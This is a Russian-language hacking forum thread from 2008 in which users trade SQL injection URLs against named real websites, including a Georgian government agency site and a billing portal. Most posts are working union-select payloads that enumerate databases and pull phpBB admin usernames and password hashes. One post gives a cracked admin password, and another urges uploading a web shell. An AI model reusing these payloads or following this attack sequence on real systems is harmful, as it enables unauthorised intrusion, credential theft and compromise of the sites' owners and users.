 |
|
27.08.2008, 22:27
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
С нами:
10065986
Репутация:
785
|
|
Сообщение от geforce
Я сам с осетии а сайт этот моей фирмы где я работаю моя задача найти дыру и покозать её! Я её нашел но вот возникает вопрос! Почему не выводит
http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
version()???
http://15rus.ru/txt.php?cat=-3+union+select+0,VERSION(),2,3,4,5,6,7,8/*
|
|
|
28.08.2008, 00:28
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами:
10885346
Репутация:
2947
|
|
Сообщение от geforce
http://15rus.ru/txt.php?cat=-3+union+select+0,schema_name,2,3,4,5,6,7,8+from+in formation_schema.schemata+limit+1,1/*
Выводит u19256 Это что?
Имха... тебе таблы нужны =\
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/*
(Зацени какой красивый вывод  )
Я бы на твоём месте заинтересовался этой:
http://15rus.ru/txt.php?cat=-3+union+select+1,concat(username,char(58),user_pas sword),3,4,5,6,7,8,9+from+phpbb_users/*
Залить шеллтеперь дело техники... кибби круто описал всё... дерзай
|
|
|
|
28.08.2008, 01:43
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
Сообщение от slider
Имха... тебе таблы нужны =\
(Зацени какой красивый вывод )
Я бы на твоём месте заинтересовался этой:
Залить шеллтеперь дело техники... кибби круто описал всё... дерзай Нашёл админа имя и пороль:
Mihael:3fde6bb0541387e4ebdadf7c2ff31123
пороль: 1q2w3e
Не заходит почему?
http://15rus.ru//forum/index.php
|
|
|
|
28.08.2008, 02:05
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Эмм, там таблиц с юзерами пхпбб форума аж 3 -
http://15rus.ru/txt.php?cat=-3+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.columns+where+column_name=0x757365 726E616D65/*
Тебе нужна не phpbb_users, а phpbb2_users, ибо у мну ща выпала ошибка -
phpBB : Critical Error
Error obtaining user details
DEBUG MODE
SELECT * FROM phpbb2_users WHERE user_id = -1
=/
Правильный запрос выглядит так -
http://15rus.ru/txt.php?cat=-3+union+select+1,concat(username,0x3a,user_passwor d),3,4,5,6,7,8,9+from+u19256.phpbb2_users+where+us er_level=1/*
Это 4 админа форума, теперь расшифровывай хэши
Последний раз редактировалось 0nep@t0p; 28.08.2008 в 02:14..
|
|
|
|
28.08.2008, 03:25
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами:
9420866
Репутация:
228
|
|
грузинский сайтег The So cial Subsi dy Agency
http://www.ssa.gov.ge
Код:
http://www.ssa.gov.ge/index.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
version() - 4.0.27
user() - ssa_gov_ge@localhost
database() - ssa_gov_ge
Пробовал получить доступ к mysql.user , но его нету. |
|
|
|
28.08.2008, 07:48
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
А подскажите плиз как увидеть поле...
....pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+237,1--
Этим запросом мы видим Table and Column в БД information_schema как сделать так чтоб было видно поле в колонке?
|
|
|
|
28.08.2008, 07:57
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
вот так
....pricelist.php?step=2&server=-2+union+select+concat_ws(0x3a3a,<имя столбца который хочешь посмотреть>)+from+<имя таблицы, где эта колонка>+limit+0,1--
|
|
|
|
28.08.2008, 08:13
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
видимо немного не так меня понели или это я не понимаю так как 1 раз инъекцию провожу
У меня есть БД information_schema в ней есть в ней есть таблица user_list в этой таблице есть поля такие как pass и login и мне нужно посмотреть значение этих полей.
С помощью этого запроса я вижу таблицу и колонку user_list:  ass
...pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+237,1--
|
|
|
|
28.08.2008, 08:17
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
я же вроде написал как...
...pricelist.php?step=2&server=-2+union+select+concat_ws(0x3a3a,login,pass)+from+u ser_list+limit+0,1--
только пробел удали в user_list |
|
|
|
28.08.2008, 08:39
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Кароче вот запрос на таблицу с полем пасс
https://billing.adenazone.ru/pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+232,1--
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
